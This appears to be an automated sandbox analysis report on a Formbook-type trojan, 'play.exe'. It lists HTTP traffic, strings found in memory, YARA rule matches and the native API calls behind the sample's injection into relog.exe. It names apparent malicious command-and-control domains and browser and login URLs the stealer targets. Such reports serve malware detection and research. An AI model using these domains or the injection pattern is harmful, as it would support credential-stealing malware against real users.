Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 31 Aug 2024 12:04:33 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-31T12:04:38.2690131Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 31 Aug 2024 12:04:35 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-08-31T12:04:38.2690131Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 31 Aug 2024 12:04:38 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-31T12:04:43.3510227Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 31 Aug 2024 12:04:40 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-08-31T12:04:45.8867537Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 31 Aug 2024 12:05:08 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 31 Aug 2024 12:05:10 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 31 Aug 2024 12:05:13 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 31 Aug 2024 12:05:15 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a4f874-94"Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:22 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:25 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:27 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:05:30 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 31 Aug 2024 12:06:22 GMTConnection: closeContent-Length: 315Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:16:59 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4765Content-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:17:01 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4786Content-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:17:04 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 12974Content-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:17:06 GMTServer: ApacheUpgrade: h2Connection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:06:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d9aP0izZuYVFphlYWy%2Bq3AMGB2yAsvEFmQG%2BmpDdfTM%2BEbPZhqii3WlRMAJrGnAvC6nukLMdBYk1wtCANeJCdXgv2giSesTUGodsOnx7L4e8rh0md%2FAF%2FjPTaYlAHSOmBDr2XGWI0w4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce5c56f4c7d26-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:07:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SbT6CQAPJlmA5JGRHgMvWp5EKS%2FIs6ab7fKz5XPUHL4pbXCR9VoliCvNbR4BdhoThL8TnVifD%2FRf9g946k%2FegTvlJdDfiQfXk4tvB8Npyor2ITUJvOBZ%2F%2Fe6oF1uFUzmfLdyFykMDj4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce5d58e966a52-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 31 Aug 2024 12:07:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IYAriX6xP8gM%2FYPvnfRxxxNcjpOVRrattKGMXPfM850NrWPTBUECdQcHYnLHZBY5DGLMiPFzuTfRB6xHTcsK9HHMpZWw%2BBICfLMcAO%2B6ldSte92yf62BkMOb6hOADfN05p%2BUu%2BsSasE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bbce5e78bed187d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
Source: relog.exe, 00000005.00000002.4105196845.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.000000000438A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.thinkphp.cn
Source: aAqvujXSGNo.exe, 00000006.00000002.4106256857.0000000005347000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.x0x9x8x8x7x6.shop
Source: aAqvujXSGNo.exe, 00000006.00000002.4106256857.0000000005347000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.x0x9x8x8x7x6.shop/ps9q/
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: relog.exe, 00000005.00000002.4103860914.0000000002D07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: relog.exe, 00000005.00000002.4103860914.0000000002D07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: relog.exe, 00000005.00000002.4103860914.0000000002D07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: relog.exe, 00000005.00000002.4103860914.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Z9
Source: relog.exe, 00000005.00000002.4103860914.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: relog.exe, 00000005.00000003.2240887847.0000000007A04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: relog.exe, 00000005.00000002.4105196845.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.0000000003244000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2354562437.0000000033C54000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: relog.exe, 00000005.00000002.4105196845.0000000004A46000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.0000000004066000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=rantup.com
Source: relog.exe, 00000005.00000002.4105196845.000000000508E000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.00000000046AE000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.kiristyle.shop/vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G

E-Banking Fraud

Source: Yara match File source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 0.2.play.exe.ba0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4104437316.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4104395231.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2062479461.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4106256857.0000000005290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4103634894.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2062031623.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2061972326.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4104462118.0000000003910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BCD283 NtClose, 0_2_00BCD283
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA1C00 EntryPoint,NtProtectVirtualMemory, 0_2_00BA1C00
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2B60 NtClose,LdrInitializeThunk, 0_2_026D2B60
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2C70 NtFreeVirtualMemory,LdrInitializeThunk, 0_2_026D2C70
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2DF0 NtQuerySystemInformation,LdrInitializeThunk, 0_2_026D2DF0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D35C0 NtCreateMutant,LdrInitializeThunk, 0_2_026D35C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D4340 NtSetContextThread, 0_2_026D4340
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D4650 NtSuspendThread, 0_2_026D4650
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2AF0 NtWriteFile, 0_2_026D2AF0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2AD0 NtReadFile, 0_2_026D2AD0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2AB0 NtWaitForSingleObject, 0_2_026D2AB0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2BE0 NtQueryValueKey, 0_2_026D2BE0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2BF0 NtAllocateVirtualMemory, 0_2_026D2BF0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2BA0 NtEnumerateValueKey, 0_2_026D2BA0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2B80 NtQueryInformationFile, 0_2_026D2B80
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2E30 NtWriteVirtualMemory, 0_2_026D2E30
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2EE0 NtQueueApcThread, 0_2_026D2EE0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2EA0 NtAdjustPrivilegesToken, 0_2_026D2EA0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2E80 NtReadVirtualMemory, 0_2_026D2E80
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2F60 NtCreateProcessEx, 0_2_026D2F60
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2F30 NtCreateSection, 0_2_026D2F30
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2FE0 NtCreateFile, 0_2_026D2FE0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2FA0 NtQuerySection, 0_2_026D2FA0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2FB0 NtResumeThread, 0_2_026D2FB0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2F90 NtProtectVirtualMemory, 0_2_026D2F90
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2C60 NtCreateKey, 0_2_026D2C60
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2C00 NtQueryInformationProcess, 0_2_026D2C00
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2CF0 NtOpenProcess, 0_2_026D2CF0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2CC0 NtQueryVirtualMemory, 0_2_026D2CC0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2CA0 NtQueryInformationToken, 0_2_026D2CA0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2D30 NtUnmapViewOfSection, 0_2_026D2D30
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2D00 NtSetInformationFile, 0_2_026D2D00
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2D10 NtMapViewOfSection, 0_2_026D2D10
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2DD0 NtDelayExecution, 0_2_026D2DD0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D2DB0 NtEnumerateKey, 0_2_026D2DB0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D3010 NtOpenDirectoryObject, 0_2_026D3010
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D3090 NtSetValueKey, 0_2_026D3090
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D39B0 NtGetContextThread, 0_2_026D39B0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D3D70 NtOpenThread, 0_2_026D3D70
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026D3D10 NtOpenProcessToken, 0_2_026D3D10
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03284340 NtSetContextThread,LdrInitializeThunk, 5_2_03284340
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03284650 NtSuspendThread,LdrInitializeThunk, 5_2_03284650
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282B60 NtClose,LdrInitializeThunk, 5_2_03282B60
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282BA0 NtEnumerateValueKey,LdrInitializeThunk, 5_2_03282BA0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282BE0 NtQueryValueKey,LdrInitializeThunk, 5_2_03282BE0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_03282BF0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282AF0 NtWriteFile,LdrInitializeThunk, 5_2_03282AF0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282AD0 NtReadFile,LdrInitializeThunk, 5_2_03282AD0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282F30 NtCreateSection,LdrInitializeThunk, 5_2_03282F30
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282FB0 NtResumeThread,LdrInitializeThunk, 5_2_03282FB0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282FE0 NtCreateFile,LdrInitializeThunk, 5_2_03282FE0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_03282E80
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282EE0 NtQueueApcThread,LdrInitializeThunk, 5_2_03282EE0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_03282D30
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_03282D10
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_03282DF0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282DD0 NtDelayExecution,LdrInitializeThunk, 5_2_03282DD0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282C60 NtCreateKey,LdrInitializeThunk, 5_2_03282C60
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_03282C70
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_03282CA0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_032835C0 NtCreateMutant,LdrInitializeThunk, 5_2_032835C0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_032839B0 NtGetContextThread,LdrInitializeThunk, 5_2_032839B0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282B80 NtQueryInformationFile, 5_2_03282B80
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282AB0 NtWaitForSingleObject, 5_2_03282AB0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282F60 NtCreateProcessEx, 5_2_03282F60
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282FA0 NtQuerySection, 5_2_03282FA0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282F90 NtProtectVirtualMemory, 5_2_03282F90
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282E30 NtWriteVirtualMemory, 5_2_03282E30
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282EA0 NtAdjustPrivilegesToken, 5_2_03282EA0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282D00 NtSetInformationFile, 5_2_03282D00
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282DB0 NtEnumerateKey, 5_2_03282DB0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282C00 NtQueryInformationProcess, 5_2_03282C00
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282CF0 NtOpenProcess, 5_2_03282CF0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03282CC0 NtQueryVirtualMemory, 5_2_03282CC0
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03283010 NtOpenDirectoryObject, 5_2_03283010
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03283090 NtSetValueKey, 5_2_03283090
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03283D10 NtOpenProcessToken, 5_2_03283D10
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_03283D70 NtOpenThread, 5_2_03283D70
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_008D9200 NtCreateFile, 5_2_008D9200
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_008D9370 NtReadFile, 5_2_008D9370
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_008D9470 NtDeleteFile, 5_2_008D9470
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_008D9510 NtClose, 5_2_008D9510
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_008D9680 NtAllocateVirtualMemory, 5_2_008D9680
Source: C:\Windows\SysWOW64\relog.exe Code function: 5_2_0310F197 NtQueryInformationProcess, 5_2_0310F197
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB91E3 0_2_00BB91E3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA1990 0_2_00BA1990
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA31D0 0_2_00BA31D0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BCF933 0_2_00BCF933
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA3AF0 0_2_00BA3AF0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB0A3A 0_2_00BB0A3A
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB0A43 0_2_00BB0A43
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB73C3 0_2_00BB73C3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BAECE3 0_2_00BAECE3
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA1C00 0_2_00BA1C00
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BB0C63 0_2_00BB0C63
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA35B0 0_2_00BA35B0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA35A7 0_2_00BA35A7
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA2DD0 0_2_00BA2DD0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_00BA2DC8 0_2_00BA2DC8
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02740274 0_2_02740274
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027202C0 0_2_027202C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275A352 0_2_0275A352
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027603E6 0_2_027603E6
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AE3F0 0_2_026AE3F0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02732000 0_2_02732000
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02728158 0_2_02728158
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02690100 0_2_02690100
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0273A118 0_2_0273A118
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027581CC 0_2_027581CC
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027541A2 0_2_027541A2
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_027601AA 0_2_027601AA
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026BC6E0 0_2_026BC6E0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0770 0_2_026A0770
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026C4750 0_2_026C4750
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269C7C0 0_2_0269C7C0
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02752446 0_2_02752446
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02744420 0_2_02744420
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0274E4F6 0_2_0274E4F6
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A0535 0_2_026A0535
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02760591 0_2_02760591
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0269EA80 0_2_0269EA80
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_0275AB40 0_2_0275AB40
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_02756BD7 0_2_02756BD7
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026A2840 0_2_026A2840
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026AA840 0_2_026AA840
Source: C:\Users\user\Desktop\play.exe Code function: 0_2_026CE8F0 0_2_026CE8F0
